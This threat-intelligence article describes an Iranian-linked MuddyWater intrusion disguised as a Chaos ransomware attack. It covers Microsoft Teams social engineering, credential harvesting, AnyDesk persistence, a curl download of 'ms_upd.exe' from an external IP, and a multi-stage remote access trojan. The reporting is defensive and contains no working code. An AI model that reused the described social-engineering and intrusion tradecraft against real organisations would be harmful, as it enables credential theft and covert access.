MuddyWater False Flag Ransomware Attack

The Iranian state-sponsored threat group MuddyWater, also tracked under aliases such as Mango Sandstorm, Seedworm, and Static Kitten, has been linked to a sophisticated ransomware campaign that investigators describe as a false-flag operation. Although the intrusion initially resembled activity associated with a conventional Ransomware-as-a-Service (RaaS) operation using the Chaos ransomware brand, deeper analysis revealed characteristics consistent with a targeted state-sponsored cyberattack disguised as financially motivated extortion.

The operation, identified in early 2026, relied heavily on social engineering through Microsoft Teams. Attackers conducted highly interactive engagement sessions with victims, leveraging screen-sharing functionality to harvest credentials and manipulate multi-factor authentication processes. After obtaining access, the threat actors abandoned traditional ransomware tactics such as large-scale file encryption and instead focused on data theft, stealthy persistence, and long-term network access through remote management utilities.

Cybercrime Tradecraft Used to Conceal State Operations

Researchers believe the campaign reflects a deliberate effort by MuddyWater to obscure attribution by adopting tools and techniques commonly associated with cybercriminal ecosystems. The group has increasingly integrated commercially available underground malware and remote access frameworks into its operations, including tools such as CastleRAT and Tsundere.

This tactic aligns with previous MuddyWater campaigns that blended espionage and destructive activity with ransomware-style operations. In 2020, the group targeted major Israeli organizations using the PowGoop loader to deploy a destructive variant of Thanos ransomware. In 2023, Microsoft linked the group to DEV-1084, an actor associated with the DarkBit persona, during attacks disguised as ransomware incidents. By late 2025, Iranian-linked operators were also suspected of using Qilin ransomware against an Israeli government hospital.

Security researchers concluded that the latest campaign likely involved Iranian-affiliated operators operating through established cybercriminal infrastructures while pursuing broader geopolitical objectives. The use of Qilin and participation in ransomware affiliate ecosystems likely provided operational cover, plausible deniability, and access to mature attack capabilities while helping the attackers evade heightened Israeli defensive monitoring.

Chaos RaaS: A Growing Extortion Ecosystem

Chaos emerged in early 2025 as a Ransomware-as-a-Service operation known for aggressive double-extortion tactics. The group promoted its affiliate program on underground cybercrime forums such as RAMP and RehubCom and rapidly expanded its operational reach.

Chaos campaigns commonly combine email flooding, voice phishing, and Microsoft Teams impersonation attacks in which threat actors pose as IT support staff. Victims are manipulated into installing remote access applications like Microsoft Quick Assist, enabling attackers to establish footholds within corporate environments before escalating privileges, moving laterally, and deploying ransomware payloads.

The group has also demonstrated increasingly aggressive extortion models:

• Double extortion through data theft and ransom demands
• Triple extortion involving threats of distributed denial-of-service (DDoS) attacks
• Quadruple extortion tactics that include threats to contact customers, partners, or competitors to intensify pressure on victims

By March 2026, Chaos had claimed 36 victims on its leak platform, with most organizations located in the United States. The construction, manufacturing, and business services sectors appeared among the most heavily targeted industries.

Anatomy of the Intrusion

During the investigated intrusion, attackers initiated external Microsoft Teams conversations with employees to gain trust and encourage screen-sharing sessions. Compromised user accounts were then leveraged for reconnaissance, persistence, lateral movement, and data exfiltration.

While connected to victim systems, the attackers executed reconnaissance commands, accessed VPN-related files, and instructed users to manually enter credentials into locally created text documents. In several instances, AnyDesk was installed to strengthen remote access capabilities.

The threat actors additionally used Remote Desktop Protocol (RDP) to retrieve an executable named “ms_upd.exe” from the external server address 172.86.126.208 using the curl utility. Once launched, the malware initiated a multi-stage infection chain designed to deploy additional malicious components and establish persistent command-and-control communications.

Malware Arsenal Behind the Campaign

The infection chain incorporated several distinct malware components that worked together to maintain persistence and execute remote commands:

• 'ms_upd.exe' (Stagecomp) gathered system information and contacted a command-and-control server to download secondary payloads including 'game.exe,' 'WebView2Loader.dll,' and 'visualwincomp.txt'
• 'game.exe' (Darkcomp) functioned as a custom remote access trojan masquerading as a legitimate Microsoft WebView2 application based on the official WebView2APISample project
• 'WebView2Loader.dll' served as a legitimate dependency required for Microsoft Edge WebView2 functionality
• 'visualwincomp.txt' contained encrypted configuration data used by the RAT to identify command-and-control infrastructure

Once active, the remote access trojan continuously communicated with its command server every 60 seconds, allowing operators to execute PowerShell scripts, run system commands, manipulate files, and spawn interactive command-line sessions.

Evidence Linking the Operation to MuddyWater

Attribution to MuddyWater was strengthened through the discovery of a code-signing certificate associated with 'Donald Gay,' which was used to sign the 'ms_upd.exe' malware sample. The same certificate had previously been linked to MuddyWater malware, including a CastleLoader downloader variant known as Fakeset.

Researchers noted that the operation demonstrated a significant convergence between state-sponsored espionage activity and cybercriminal operational methods. The integration of ransomware branding, extortion negotiations, and commercially available malware frameworks complicated attribution efforts and diverted defensive attention toward immediate ransom response activities rather than long-term persistence mechanisms established through remote access tools.

Why the Attack Stood Out

One of the most unusual aspects of the campaign was the apparent absence of widespread file encryption despite the use of Chaos ransomware artifacts. This deviation from standard ransomware behavior strongly suggests that the ransomware component functioned primarily as camouflage or operational misdirection rather than the primary mission objective.

The campaign also highlights a growing trend among Iranian threat actors to incorporate cybercrime tooling into state-directed operations. By leveraging existing underground infrastructures and malware ecosystems, groups such as MuddyWater gain greater operational flexibility, reduce internal development costs, and significantly complicate attribution efforts for defenders and intelligence analysts alike.